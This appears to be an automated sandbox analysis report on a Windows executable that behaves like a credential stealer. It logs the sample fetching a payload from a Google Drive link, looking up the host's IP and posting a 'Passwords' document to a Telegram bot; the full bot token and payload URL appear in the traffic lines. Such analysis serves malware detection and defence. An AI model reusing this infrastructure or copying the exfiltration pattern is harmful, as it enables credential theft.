            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49913 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31dfbf4d9096Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035D94000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2951594871.0000000038912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/_
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgp
            Source: ZaRP7yvL1J.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgp
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2932353178.00000000057C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005835000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2523839008.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2523839008.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2932353178.000000000581C000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm&export=download
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2523839008.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm&export=download7I
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2523839008.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm&export=downloadMI
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005835000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2523839008.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/hobf
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: ZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49855 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49866 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49968 version: TLS 1.2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004034A5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_6F951B5F0_2_6F951B5F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_00404DCC4_2_00404DCC
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_00406AF24_2_00406AF2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_000D43284_2_000D4328
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_000D90484_2_000D9048
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_000D5F904_2_000D5F90
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_000D2DD14_2_000D2DD1
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805587A4_2_3805587A
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805331A4_2_3805331A
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_380503C44_2_380503C4
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805CCA04_2_3805CCA0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_380576284_2_38057628
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805C6384_2_3805C638
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805F0424_2_3805F042
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_380578484_2_38057848
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805B08A4_2_3805B08A
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805B9304_2_3805B930
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_380569CB4_2_380569CB
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805C1F24_2_3805C1F2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805DA894_2_3805DA89
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805E33D4_2_3805E33D
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805EBF24_2_3805EBF2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805CC824_2_3805CC82
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805B4EC4_2_3805B4EC
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805BD884_2_3805BD88
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_38056E914_2_38056E91
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_38056EA04_2_38056EA0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805DEE54_2_3805DEE5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805E7944_2_3805E794
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AA9B04_2_387AA9B0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387ABA974_2_387ABA97
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AA3604_2_387AA360
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A9D104_2_387A9D10
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387ABDF04_2_387ABDF0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A86504_2_387A8650
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A96C84_2_387A96C8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A70704_2_387A7070
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A18584_2_387A1858
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A00404_2_387A0040
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A48204_2_387A4820
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A20FA4_2_387A20FA
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AF1304_2_387AF130
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AF1204_2_387AF120
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A21084_2_387A2108
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A29B84_2_387A29B8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A29A84_2_387A29A8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AA9A04_2_387AA9A0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A32684_2_387A3268
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A32584_2_387A3258
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A52084_2_387A5208
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A52074_2_387A5207
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A5AB84_2_387A5AB8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A63684_2_387A6368
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A63614_2_387A6361
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AA3524_2_387AA352
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A7B4F4_2_387A7B4F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A3B1A4_2_387A3B1A
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A3B184_2_387A3B18
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A13F04_2_387A13F0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A43C84_2_387A43C8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A6C184_2_387A6C18
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A6C094_2_387A6C09
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A14004_2_387A1400
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A74C84_2_387A74C8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A1CB04_2_387A1CB0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A1CA04_2_387A1CA0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A25604_2_387A2560
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A25514_2_387A2551
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A9D004_2_387A9D00
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A4DB24_2_387A4DB2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A4DB04_2_387A4DB0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A56604_2_387A5660
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A565F4_2_387A565F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A86404_2_387A8640
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A2E104_2_387A2E10
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A36C04_2_387A36C0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A96B84_2_387A96B8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A36B04_2_387A36B0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A3F704_2_387A3F70
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A3F604_2_387A3F60
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A5F104_2_387A5F10
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AAFF84_2_387AAFF8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387AAFF74_2_387AAFF7
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A67C04_2_387A67C0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A67B04_2_387A67B0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_387A0FA84_2_387A0FA8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_390E6FA04_2_390E6FA0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_390E04574_2_390E0457
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_390EE7C84_2_390EE7C8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_390ED6C14_2_390ED6C1
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_390E83284_2_390E8328
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: String function: 00402C41 appears 51 times
            Source: ZaRP7yvL1J.exe, 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs ZaRP7yvL1J.exe
            Source: ZaRP7yvL1J.exe, 00000004.00000000.2361500694.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs ZaRP7yvL1J.exe
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950113387.0000000035BD7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ZaRP7yvL1J.exe
